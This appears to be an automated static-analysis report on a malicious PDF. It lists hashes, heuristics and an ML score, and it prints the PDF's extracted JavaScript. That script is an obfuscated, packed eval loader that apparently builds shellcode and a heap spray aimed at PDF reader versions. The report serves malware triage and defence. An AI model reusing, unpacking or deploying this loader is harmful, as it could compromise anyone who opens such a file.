Malicious PDF — malware analysis report

Static analysis result for SHA-256 feba659f20c57764…

MALICIOUS

PDF

10.1 KB Created: 2009-07-25 17:54:00 Authoring application: cFulPsmYTLfUZjgm (via vNLWeXXUaJWyPQPI) First seen: 2013-08-26
MD5: 98de31bcd36c4b1a930dddc77b99bf1e SHA-1: 253064da2f294bc3d7b57e6cff163e4c0dc128e4 SHA-256: feba659f20c5776420e7b9992daec7e569086f8b34fa83988644337df746f363
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The ML classifier strongly flagged this PDF as malicious. The embedded JavaScript stream, named javascript_obj0007_000.js, is obfuscated and likely responsible for downloading and executing a second-stage payload. The document body text appears to be nonsensical filler, suggesting the primary malicious function is within the script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    ,d
\){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1z 2h\(10\){S O=0;S Y="";2i\(O=0;O<10.27;O++\){Y=Y+2n.1W\(10.2w\(O\)^1\)}1w Y}1z 1A\(1x\){1w 1E\(1x\)}S 14=1C.1F.1V\(\);14=14.1v\(/\\\\D/g,""\);S 1 …
)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x36F 8683 bytes
SHA-256: 2827afae79ee8fb524cba4350537adfb871a45b724a6ddbcb47fc6053e20926b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function Chjycvkn(T36cf0qr){

 eval (
 T36cf0qr
 );
}

Chjycvkn(
function(
p
,a
,c,k
,e
,d
){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1z 2h(10){S O=0;S Y="";2i(O=0;O<10.27;O++){Y=Y+2n.1W(10.2w(O)^1)}1w Y}1z 1A(1x){1w 1E(1x)}S 14=1C.1F.1V();14=14.1v(/\\D/g,"");S 1J="$1S$3l$1y$3m$2Z$A"+"Q$2Y$3e$3f$3g$3n"+"$3o$3v$3w$1n$t`3x$X"+"3u$3t$3p$3q$2X$2W"+"$2G$1y$2H$z$2I$2E"+"2D$2A$f$2B$2J$z"+"$2K$2S$N`$U$z$I"+"2T$1u$f$1e$1d$z"+"$H$N`$U$z$15$A"+"2N$P`1b$3z$2P$f$1g"+"$19$17$1a$18$1c$W"+"2O$H$N`$1t$B$R"+"$V$1p$f$J`K$L$A"+"2L$f$2M$V$1r$f"+"$M`$M`$J`K$L$12$A"+"Q$1s$N`$2Q$B$R"+"$M`$1i$1l`$J`K$L$A"+"2R$f$2V$I`1k$z$H"+"$N`$U$z$R$1u$A"+"Q$1e$1d$z$H$N`"+"$U$z$15$2C$P`1b$W"+"2y$2z$f$1g$19$17"+"$1a$18$1c$2F$H$P"+"1o`$1t$B$R$V$1p"+"$f$J`K$L$3s$f$I"+"3r$V$1r$f$M`$M`"+"$J`K$L$12$f$1s$P"+"1o`$t`3y$B$R$M`$1i"+"$1l`$J`K$L$12$f$3h"+"3i$I`1k$z$3k$3j$I`4d"+"$2x$2o$f$f$f$A"+"Q$f$f$f$f$1f"+"$1O$1N$1M$1K$1L$X"+"1P$1m$1Q$1U$1T$1B"+"$1D$1f$1I$1G$1H$16"+"1R$2p$2m$2q$2r$2v"+"$2u$2t$2s$2l$2k$23"+"4`d$21$1Z$1X$1Y$24"+"$f$1q$T$f$t`1h$P"+"2j$T$f$1n$2g$2U"+"$1q$T$f$4p$4Z$A"+"Q$1j`e$11$B$t`4U$1j`e"+"$11$B$4J$t`e`c$13$A"+"4I$f$4L`c$4M$4P`e$13"+"$T$f$4O$4R$4N$t`"+"4H$4G$4A$4z$4y$4B"+"$4C$3A$B$15$4F$t`"+"1h$4E$4D$4Q$B$H"+"$t`5f$13$T$f$5e$A"+"5c$f$f$f$f$f"+"$f$f$H$11$B$I"+"58$5a$5h$5i$5g$50`c"+"$54$4T$4V$4W$4Y$X"+"4X$4S$4K$4w$3Q$3P"+"$3O$3N$3R$1m$3S$X"+"3V$3U$3T$3M$3L$3E"+"$3D$3C$3B$3F$3G$3K"+"3J$3I$3H$3W$3X$4q`"+"$4x$4o$4n$W`6$4r$W"+"4s$4v$4u$4t$4m$4l"+"$44$40$3Z$3Y$4b$16"+"4g$4k$4j"+"";S Z="@p@y@28"+"@4f@r@7"+"@31@36@o"+"@q@2e@j"+"@x@3@2"+"@41@i@28"+"@30@29@20"+"@3d@3d@20"+"@22@38@22"+"@20@26@26"+"@20@4f@r"+"@7@31@36"+"@o@q@2e"+"@j@x@3"+"@2@41@i"+"@28@31@29"+"@20@3c@3d"+"@20@22@31"+"@22@20@26"+"@26@20@4f"+"@r@7@31"+"@36@o@q"+"@2e@j@x"+"@3@2@41"+"@i@28@32"+"@29@20@3c"+"@3d@20@22"+"@32@22@29"+"@E@b@l"+"@4c@q@2"+"@p@8@5"+"@s@s@20"+"@3d@20@4c"+"@5@w@36"+"@G@r@33"+"@28@59@q"+"@39@q@G"+"@n@28@4c"+"@32@37@q"+"@i@38@a"+"@29@29@3b"+"@b@l@n"+"@3@2@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@20@3d@20"+"@4c@5@w"+"@36@G@r"+"@33@28@22"+"@25@8@30"+"@3@30@3"+"@22@20@2b"+"@20@22@25"+"@8@30@3"+"@30@3@22"+"@20@2b@20"+"@22@22@29"+"@3b@b@l"+"@n@3@2"+"@20@52@v"+"@h@o@m"+"@3@20@3d"+"@20@32@30"+"@20@2b@20"+"@4c@q@2"+"@p@8@5"+"@s@s@2e"+"@h@6@9"+"@m@i@x"+"@3b@b@l"+"@F@x@p"+"@h@6@28"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@2e@h@6"+"@9@m@i"+"@x@20@3c"+"@20@52@v"+"@h@o@m"+"@3@29@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@20@2b@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@3b@b"+"@l@n@3"+"@2@20@4a"+"@34@34@k"+"@r@h@7"+"@32@20@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@52@v@h"+"@o@m@3"+"@29@3b@b"+"@l@n@3"+"@2@20@42"+"@7@31@r"+"@3@30@38"+"@h@20@3d"+"@20@48@o"+"@2@a@39"+"@v@6@31"+"@9@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@48@o@2"+"@a@39@v"+"@6@31@9"+"@2e@h@6"+"@9@m@i"+"@x@20@2d"+"@20@52@v"+"@h@o@m"+"@3@29@3b"+"@b@l@F"+"@x@p@h"+"@6@28@42"+"@7@31@r"+"@3@30@38"+"@h@2e@h"+"@6@9@m"+"@i@x@20"+"@2b@20@52"+"@v@h@o"+"@m@3@20"+"@3c@20@30"+"@k@36@30"+"@30@30@30"+"@29@20@42"+"@7@31@r"+"@3@30@38"+"@h@20@3d"+"@20@42@7"+"@31@r@3"+"@30@38@h"+"@20@2b@20"+"@42@7@31"+"@r@3@30"+"@38@h@20"+"@2b@20@4a"+"@34@34@k"+"@r@h@7"+"@32@3b@b"+"@l@n@3"+"@2@20@51"+"@o@q@7"+"@r@v@34"+"@p@n@20"+"@3d@20@9"+"@6@F@20"+"@41@2@2"+"@3@r@28"+"@29@3b@b"+"@l@y@u"+"@2@28@55"+"@8@5@j"+"@34@j@2"+"@20@3d@20"+"@30@3b@20"+"@55@8@5"+"@j@34@j"+"@2@20@3c"+"@20@31@32"+"@30@30@3b"+"@20@55@8"+"@5@j@34"+"@j@2@2b"+"@2b@29@E"+"@51@o@q"+"@7@r@v"+"@34@p@n"+"@5b@55@8"+"@5@j@34"+"@j@2@5d"+"@20@3d@20"+"@42@7@31"+"@r@3@30"+"@38@h@20"+"@2b@20@4c"+"@q@2@p"+"@8@5@s"+"@s@C@b"+"@l@n@3"+"@2@20@53"+"@a@6@8"+"@7@k@20"+"@3d@20@22"+"@31@32@22"+"@3b@b@l"+"@y@u@2"+"@20@28@n"+"@3@2@20"+"@46@a@5"+"@s@a@i"+"@5@3d@30"+"@3b@20@46"+"@a@5@s"+"@a@i@5"+"@3c@31@38"+"@3b@20@46"+"@a@5@s"+"@a@i@5"+"@2b@2b@29"+"@E@20@53"+"@a@6@8"+"@7@k@20"+"@3d@20@53"+"@a@6@8"+"@7@k@2b"+"@22@39@22"+"@3b@C@b"+"@l@y@u"+"@2@20@28"+"@n@3@2"+"@20@46@a"+"@5@s@a"+"@i@5@3d"+"@30@3b@20"+"@46@a@5"+"@s@a@i"+"@5@3c@32"+"@37@36@3b"+"@20@46@a"+"@5@s@a"+"@i@5@2b"+"@2b@29@E"+"@20@53@a"+"@6@8@7"+"@k@20@3d"+"@20@53@a"+"@6@8@7"+"@k@2b@22"+"@38@22@3b"+"@C@b@20"+"@20@20@20"+"@8@i@p"+"@h@2e@w"+"@2@p@9"+"@i@y@28"+"@22@25@34"+"@35@30@30"+"@30@y@22"+"@2c@20@53"+"@a@6@8"+"@7@k@29"+"@3b@b@C"+"@b@6@h"+"@5@6@E"+"@b@20@20"+"@20@20@b"+"@l@n@3"+"@2@20@42"+"@3@k@32"+"@w@p@7"+"@38@33@20"+"@3d@20@9"+"@6@F@20"+"@41@2@2"+"@3@r@28"+"@29@3b@b"+"@l@y@8"+"@9@j@i"+"@p@u@9"+"@20@4a@9"+"@32@a@35"+"@5@31@28"+"@4f@m@8"+"@34@7@k"+"@33@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@29@E"+"@b@l@F"+"@x@p@h"+"@6@28@4f"+"@m@8@34"+"@7@k@33"+"@2e@h@6"+"@9@m@i"+"@x@20@2a"+"@20@32@20"+"@3c@20@4c"+"@q@5@30"+"@6@y@a"+"@29@E@b"+"@l@4f@m"+"@8@34@7"+"@k@33@20"+"@2b@3d@20"+"@4f@m@8"+"@34@7@k"+"@33@3b@C"+"@b@l@4f"+"@m@8@34"+"@7@k@33"+"@20@3d@20"+"@4f@m@8"+"@34@7@k"+"@33@2e@5"+"@8@s@5"+"@i@2@p"+"@9@m@28"+"@30@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@20@2f"+"@20@32@29"+"@3b@b@l"+"@2@6@i"+"@8@2@9"+"@20@4f@m"+"@8@34@7"+"@k@33@3b"+"@C@b@l"+"@n@3@2"+"@20@56@3"+"@r@35@s"+"@2@7@20"+"@3d@20@30"+"@k@30@j"+"@30@j@30"+"@j@30@j"+"@3b@b@l"+"@n@3@2"+"@20@57@32"+"@6@q@36"+"@9@20@3d"+"@20@4c@5"+"@w@36@G"+"@r@33@28"+"@59@q@39"+"@q@G@n"+"@28@4c@32"+"@37@q@i"+"@38@a@29"+"@29@3b@b"+"@l@n@3"+"@2@20@49"+"@n@35@w"+"@a@7@20"+"@3d@20@30"+"@k@34@30"+"@30@30@30"+"@30@3b@b"+"@l@n@3"+"@2@20@55"+"@w@31@34"+"@32@F@39"+"@34@20@3d"+"@20@57@32"+"@6@q@36"+"@9@2e@h"+"@6@9@m"+"@i@x@20"+"@2a@20@32"+"@3b@b@l"+"@n@3@2"+"@20@4c@q"+"@5@30@6"+"@y@a@20"+"@3d@20@49"+"@n@35@w"+"@a@7@20"+"@2d@20@28"+"@55@w@31"+"@34@32@F"+"@39@34@2b"+"@30@k@33"+"@38@29@3b"+"@b@l@n"+"@3@2@20"+"@4f@m@8"+"@34@7@k"+"@33@20@3d"+"@20@4c@5"+"@w@36@G"+"@r@33@28"+"@22@25@8"+"@39@30@39"+"@30@25@8"+"@39@30@39"+"@30@22@29"+"@3b@b@l"+"@4f@m@8"+"@34@7@k"+"@33@20@3d"+"@20@4a@9"+"@32@a@35"+"@5@31@28"+"@4f@m@8"+"@34@7@k"+"@33@2c@20"+"@4c@q@5"+"@30@6@y"+"@a@29@3b"+"@b@l@n"+"@3@2@20"+"@42@2@j"+"@39@x@34"+"@i@20@3d"+"@20@28@56"+"@3@r@35"+"@s@2@7"+"@20@2d@20"+"@30@k@34"+"@30@30@30"+"@30@30@29"+"@20@2f@20"+"@49@n@35"+"@w@a@7"+"@3b@b@l"+"@y@u@2"+"@20@28@n"+"@3@2@20"+"@4e@u@k"+"@p@9@9"+"@2@2@20"+"@3d@20@30"+"@3b@20@4e"+"@u@k@p"+"@9@9@2"+"@2@20@3c"+"@20@42@2"+"@j@39@x"+"@34@i@3b"+"@4e@u@k"+"@p@9@9"+"@2@2@2b"+"@2b@29@E"+"@42@3@k"+"@32@w@p"+"@7@38@33"+"@5b@4e@u"+"@k@p@9"+"@9@2@2"+"@5d@20@3d"+"@20@4f@m"+"@8@34@7"+"@k@33@20"+"@2b@20@57"+"@32@6@q"+"@36@9@3b"+"@C@b@l"+"@n@3@2"+"@20@47@38"+"@j@v@o"+"@u@w@20"+"@3d@20@4c"+"@5@w@36"+"@G@r@33"+"@28@22@25"+"@8@30@j"+"@30@j@22"+"@20@2b@20"+"@22@25@8"+"@30@j@30"+"@j@22@20"+"@2b@20@22"+"@22@29@3b"+"@b@l@F"+"@x@p@h"+"@6@28@47"+"@38@j@v"+"@o@u@w"+"@2e@h@6"+"@9@m@i"+"@x@20@3c"+"@20@34@34"+"@39@35@32"+"@29@20@47"+"@38@j@v"+"@o@u@w"+"@20@2b@3d"+"@20@47@38"+"@j@v@o"+"@u@w@3b"+"@b@l@i"+"@x@p@5"+"@2e@j@u"+"@h@h@3"+"@s@53@i"+"@u@2@6"+"@20@3d@20"+"@43@u@h"+"@h@3@s"+"@2e@j@u"+"@h@h@6"+"@j@i@45"+"@o@3@p"+"@h@49@9"+"@y@u@28"+"@E@5@8"+"@s@7@3a"+"@20@22@22"+"@2c@o@5"+"@m@3a@20"+"@47@38@j"+"@v@o@u"+"@w@C@29"+"@3b@b@C"+"";Z=Z.1v(/@/g,"%4i");4h(1A(Z));',62,329,'||72|61||73|65|6a|75|6e|64|0a||||t1111||6c|74|63|78|09|67|76|6d|69|6b|79|62||6f|71|70|68|66|t1110|t1|t1113|7d||7b|77|7a|t9811|t4|td|98|tb390|t117|t90d|Eaf11w|t9|111|t4311|var|t130c|t4db3|t84gg|t2|t5|Ymvmja|Fe95b8ty|Vbsgdfgi|t0c94|t104d|t9412|Oyj16mk|t2011|t7|t9917|tdc57|t6511|t230b|b3|tb7dd|t5d84|tgg11|t7456|tgc91|e77|te1gg|t12|84|t147|t707g|t619c|0d|t1043|tc412|t1047|t9843|t54b3|t9179|replace|return|Ynayhkxfmz|t4647|function|Lsp6zy3|t6863|app|t1150|unescape|viewerVersion|t7g63|t5072|t4165|L27kt8d|t6570|t5079|t4161|t7e74|t4565|b11|t5b75|575|t4241|t7063|t7378|toString|fromCharCode|t20g8|tcdb1|t98g6||t38ge||t6|t112b|||length|||||||||t9269|Yk9kzv|for|412|tb121|tg698|t6262|String|tb249|t7463|t4611|t7d78|tg398|tcc11|t7274|t6954|charCodeAt|t4c48|48b|t137d|t105d|tdg10|t10g7|gdd|tc|t2315|t2b51|t4dcd|t1011|te7d9|t4g11|341|t4143|0g7|315|t1372|t69b3|04d|t984d|311|t0bb7|tgg43|t9c6b|t519e|t4e11|t11d9|||||||||||||||tde92|t201e|t75b1|tg|g43|t4g4e|t8e11|t4340|t8b44|t5112|t6921|t9c18|t2551|143|t1341|tdc19|19c|t9c1b|t1b51|e0b|7b3|t248b|t3694|t1174|t6974|t3d75|t6164|t6372|t6270|t1161|t7961|d79|t3|t7775|t6111|t667g|t555b|t4344|t115b|t7b7d|t4575|t5074|t7b78|77g|t6579|t6165|t3724|t2e75|t782g||||t6179|||||||t7479|||||b7b|eval|u00|t8111|t267g|t613d|t747e|t703d|t7b24|tce9e|t3g2|t2129|129|t7g72|t7b74|t663g|t5b55|t703g|t4dd8|tdc52|t4d15|te082|t12d1|t1213|td1b0|t87g7|t6548|7g2|30c|t4111|t3d5d|t4d|tec20|tgb40|tb798|t47|t0g94|te698|t5g5e|tcc2d|c11|t1365|tdedc|b43|t44b2|t130g|t10||||t91bd||||711||td946||101||tdcb2|eb7|t4d4g|tgg49|tgggg'.split('|'),0,{}))

Open this report in the interactive analyzer, or submit your own file for analysis.